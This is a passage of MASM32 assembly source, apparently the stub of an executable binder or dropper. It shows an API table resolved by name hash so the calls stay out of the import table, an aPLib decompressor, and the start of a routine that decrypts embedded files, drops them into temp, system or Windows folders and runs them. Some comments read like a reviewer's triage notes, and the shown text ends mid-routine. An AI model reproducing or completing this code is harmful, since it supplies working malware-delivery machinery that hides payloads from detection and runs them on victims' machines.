; ----------------------------------------
;
; (C) Alex Demchenko (coban2k@mail.ru)
; http://www.cobans.net
;
; ----------------------------------------
; #########################################################################
; Stub size: 1536 bytes
; Assembler: MASM32
; Linker: MS Incremental Linker 5.12.8078 (FIXED)
; There are some offsets that should be fixed from the GUI (they are commented
; somewhere below). These jump offsets should be written in STUB_FIX1
; and STUB_FIX2 accordingly.
; "EncodeToDb" util is used to encode exe files into masm .inc files, which can
; be stored in the GUI's .data section
; "ProcGen" util is used to generate function hashes
; Thanks to
; LSD team for hash function
; Sars for kernel32 hModule search method (after some optimizations, this
; method weighs less than LSD's PEB scanning :)
; Iczelion for great asm manuals and PE tutorials
; #########################################################################
.386
.model flat, stdcall
option casemap :none ; case sensitive
; #########################################################################
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
.data?
; Global Buffers (do not change order)
lpBuf db 512 dup(?) ; Common buffer
lpSelfPath db 512 dup(?) ; Path of current executable
lpMeltSrc db 512 dup(?) ; Melting source buffer
lpAltArgs db 512 dup(?) ; Alternative arguments (melting)
lpPath db 512 dup(?) ; Directory to run from
.data
; Names of the DLLs whose exports the stub looks up at runtime.
szKernel db "kernel32",0
szUser db "user32",0
szShell db "shell32",0
szAdvApi db "advapi32",0
; Function table. The .const block below names slot n as dword ptr [ebp+4*n],
; so ebp must point at dwFuncs whenever those equates are used (the code that
; sets ebp up is outside this chunk).
; Slots 0-16 start life as 32-bit name hashes ("ProcGen" output, see the file
; header); later code calls straight through the slots (e.g. call
; _GetWindowsDirectory), so a resolver not visible here presumably replaces
; each hash with the API address first. Because the APIs are reached by hash,
; none of them appear in the stub's import table — worth knowing when
; triaging a binary built from this stub.
dwFuncs dd 045744193h ; ShellExecuteA
dd 0c0d6d616h ; CloseHandle
dd 0e6ff2cb9h ; ExitProcess
dd 038c62a7ah ; CreateFileA
dd 01475bb1ah ; GetSystemDirectoryA
dd 08aaff1bbh ; GetTempFileNameA
dd 0b929dc95h ; GetTempPathA
dd 01259ad09h ; GetWindowsDirectoryA
dd 0c2f6d009h ; GlobalAlloc
dd 058d8c545h ; WriteFile
dd 049462a7bh ; DeleteFileA
dd 060f43f1bh ; GetModuleFileNameA
dd 0789f5271h ; wsprintfA
dd 006eb9d6ah ; CreateDirectoryA
dd 0d24e569ah ; GetCurrentDirectoryA
dd 0a718d938h ; RegCreateKeyA
dd 09775a748h ; RegSetValueExA
; Slots 17-21: addresses of internal helpers and of the lpPath buffer
dd offset CommonLoad ; slot 17, _CommonLoad
dd offset _lstrlen ; slot 18, __lstrlen
dd offset _lstrcpyd ; slot 19, __lstrcpyd
dd offset _lstrcpyd2 ; slot 20, __lstrcpyd2
dd offset lpPath ; slot 21, _lpPath
; Slots 22-25: filler dwords; at runtime these slots are reused as the
; variables _lpMem, _esp, _ofsdir and _dwLen, so the initial text is never
; meaningful to the code.
dd "ssa*"
dd "lbme"
dd "or y"
dd "*xx"
dd offset getbit ; slot 26, _getbit: bit reader of the aPLib depacker, called indirectly
szOpen db "open",0 ; slot 27, _szOpen: verb string for ShellExecuteA
.const
; Function offsets table
; Each equate names one dword slot of dwFuncs relative to ebp, which must
; hold the table's address (set up outside this chunk). Slots 0-16 are the
; API entries, 17-21 the internal helpers and lpPath, 22-25 scratch
; variables that overwrite the filler dwords in .data, 26 the getbit entry
; and 27 the szOpen string that directly follows the table.
_ShellExecute equ dword ptr[ebp+4*0]
_CloseHandle equ dword ptr[ebp+4*1]
_ExitProcess equ dword ptr[ebp+4*2]
_CreateFile equ dword ptr[ebp+4*3]
_GetSystemDirectory equ dword ptr[ebp+4*4]
_GetTempFileName equ dword ptr[ebp+4*5]
_GetTempPath equ dword ptr[ebp+4*6]
_GetWindowsDirectory equ dword ptr[ebp+4*7]
_GlobalAlloc equ dword ptr[ebp+4*8]
_WriteFile equ dword ptr[ebp+4*9]
_DeleteFile equ dword ptr[ebp+4*10]
_GetModuleFileName equ dword ptr[ebp+4*11]
_wsprintf equ dword ptr[ebp+4*12]
_CreateDirectory equ dword ptr[ebp+4*13]
_GetCurrentDirectory equ dword ptr[ebp+4*14]
_RegCreateKey equ dword ptr[ebp+4*15]
_RegSetValueEx equ dword ptr[ebp+4*16]
_CommonLoad equ dword ptr[ebp+4*17]
__lstrlen equ dword ptr[ebp+4*18]
__lstrcpyd equ dword ptr[ebp+4*19]
__lstrcpyd2 equ dword ptr[ebp+4*20]
_lpPath equ dword ptr[ebp+4*21] ; address of the lpPath buffer
_lpMem equ dword ptr[ebp+4*22] ; destination buffer used by _aP_depack_asm
_esp equ dword ptr[ebp+4*23] ; stack pointer saved at the start of Write
_ofsdir equ dword ptr[ebp+4*24] ; offset of the custom run directory (set in Write)
_dwLen equ dword ptr[ebp+4*25] ; length value; its use is not visible in this chunk
_getbit equ dword ptr[ebp+4*26] ; address of getbit, called indirectly by the depacker
_szOpen equ dword ptr[ebp+4*27] ; location of the "open" verb string
.code
; #########################################################################
; aPLib unpack (_aP_depack_asm)
; -----------------------------------------------------------------------
; _aP_depack_asm: aPLib decompressor (the standard aPLib depack loop).
; In:    esi = packed input stream
;        _lpMem ([ebp+4*22]) = destination buffer
;        ebp = base of the dwFuncs table (set up by the caller, not here)
; Out:   eax = number of unpacked bytes (stored into the pushad eax slot)
; Clobb: flags; every other register is restored by popad
; Regs:  edi = output cursor, ebx = last match offset ("lastpos"),
;        dl  = bit buffer (sentinel 1 bit marks the end of the byte),
;        dh  = 1 after a match, 2 after a literal — codepair uses it to
;              decide whether a gamma code means "reuse lastpos"
; getbit is called through the _getbit table slot rather than directly;
; presumably so the code survives being relocated (see the header note on
; offsets fixed from the GUI).
; NOTE(review): there is no bounds check on esi (input) or edi (output):
; a malformed or truncated stream makes rep movsb / movsb read and write
; past both buffers. The caller must size _lpMem for the full unpacked
; length and only feed this routine data it has validated.
; Assumes DF is clear (forward string operations).
; -----------------------------------------------------------------------
_aP_depack_asm:
pushad
mov edi, _lpMem ; edi = output cursor
mov dl, 80h ; "empty" bit buffer: the first add dl,dl overflows and forces a reload
literal:
movsb ; copy one literal byte src -> dst
mov dh, 2 ; last token was a literal
nexttag:
call _getbit ; tag 0 -> literal
jnc literal
xor ecx, ecx
call _getbit ; tag 10 -> gamma-coded offset/length pair
jnc codepair
xor eax, eax
call _getbit ; tag 110 -> short match (1-byte offset, length 2-3)
jnc shortmatch
mov dh, 2 ; tag 111 -> 4-bit offset, single byte copy
inc ecx ; length 1
mov al, 10h ; sentinel: after four adc shifts the 1 falls into CF
getmorebits:
call _getbit
adc al, al ; shift the next offset bit in
jnc getmorebits ; sentinel not out yet -> more bits
jnz domatch ; offset != 0 -> copy one byte from edi-eax
stosb ; offset 0 -> emit a zero byte (al == 0 here)
jmp short nexttag
codepair:
call getgamma_no_ecx ; ecx = gamma (ecx already 0, so result >= 2)
push edx
movzx edx, dh ; subtract 2 after a literal, 1 after a match
sub ecx, edx
pop edx
jnz normalcodepair ; non-zero -> a new offset follows
call getgamma ; zero -> reuse lastpos; ecx = length
jmp short domatch_lastpos
shortmatch:
lodsb ; al = (offset << 1) | low length bit
shr eax, 1 ; eax = offset, CF = length bit
jz donedepacking ; offset 0 is the end-of-stream marker
adc ecx, ecx ; ecx = CF (0 or 1)
jmp short domatch_with_2inc ; length = 2 or 3
normalcodepair:
xchg eax, ecx ; eax = gamma - dh
dec eax
shl eax, 8
lodsb ; eax = offset = ((gamma - dh - 1) << 8) | next byte
call getgamma ; ecx = length
cmp eax, 32000 ; length adjustment depends on the offset range:
jae domatch_with_2inc ; offset >= 32000 -> +2
cmp ah, 5
jae domatch_with_inc ; offset >= 1280 -> +1
cmp eax, 7fh
ja domatch_new_lastpos ; 128 <= offset < 1280 -> unchanged
domatch_with_2inc: ; offset < 128 -> +2
inc ecx
domatch_with_inc:
inc ecx
domatch_new_lastpos:
xchg eax, ebx ; remember this offset as lastpos
domatch_lastpos:
mov eax, ebx ; eax = offset
mov dh, 1 ; last token was a match
domatch:
push esi
mov esi, edi
sub esi, eax ; source = dst - offset; may overlap the bytes being written
rep movsb ; byte-wise copy, so overlap acts as a repeat
pop esi
jmp short nexttag
getbit:: ; global label: also reachable through the _getbit table slot
add dl, dl ; shift the next bit into CF
jnz stillbitsleft ; bits left in the buffer (sentinel not reached)
mov dl, [esi] ; reload; inc does not touch CF, so the carry from the
inc esi ; add above (the old sentinel) becomes the new sentinel
adc dl, dl ; ... and the byte's top bit is returned in CF
stillbitsleft:
ret
getgamma:
xor ecx, ecx
getgamma_no_ecx:
inc ecx ; gamma code: implicit leading 1, then (data bit, continue bit) pairs
getgammaloop:
call _getbit
adc ecx, ecx ; append the data bit
call _getbit
jc getgammaloop ; continue bit set -> more pairs follow
retn
donedepacking:
sub edi, _lpMem ; unpacked length = end cursor - start of buffer
mov [esp + 28], edi ; return unpacked length in eax (pushad's eax slot)
popad
retn
; Process each file (create, unpack, decrypt, write, execute)
Write proc uses esi
mov _esp, esp
mov byte ptr[ebx], 0
lodsd
xchg eax, edx
lodsd
push eax ; dwShellVis
push esi ; lpOfsArgs
call __lstrcpyd2 ; Decrypt
push esi ; szKey
call __lstrcpyd2 ; Decrypt
lodsd
push eax ; dwFileAttribs
push edx ; Param bit-mask
mov _ofsdir, esi ; Offset to custom directory
call __lstrcpyd2 ; Decrypt
push esi
@dir_again:
; Common params
push 500
push ebx
mov ecx, _GetTempPath
test dl, dl
jz @dir_temp
shr dl, 1
jc @dir_sys
shr dl, 1
jc @dir_win
shr dl, 1
jc @dir_cur
@dir_cust:
; Run from custom folder
pop edx
pop ecx ; = 500
mov esi, _ofsdir
call __lstrcpyd
jmp @F
@dir_win:
; Run from Windows folder
call _GetWindowsDirectory
jmp @F
@dir_sys:
; Run from System folder
call _GetSystemDirectory
jmp @F
@dir_cur:
; Run from Current folder
mov ecx, _GetCurrentDirectory
@dir_temp:
; Run from Temp folder
pop eax
pop edx
push eax
push edx
call ecx
@@:
; Check if directory is not empty
; and if it's empty (NULL) get windows directory
cmp byte ptr[ebx], 0
jnz @F
mov dl, 2
jmp @dir_again
@@:
mov edi, ebx
mov ecx, 500
; Copy Directory to lpPath
mov edx, _lpPath
mov esi, ebx
call __lstrcpyd
; Create temp or custom folder
; ----------------------------
; Windows can't create subfolders within unexistant parent
; folder (eg. C:\111\222\333) :(
@create_dir:
mov al, '\'
repne scasb
push ecx
mov byte ptr[edi-1], 0
push 0
push ebx
call _CreateDirectory
mov byte ptr[edi-1], '\'
pop ecx
test ecx, ecx
jnz @create_dir
push ebx
push ecx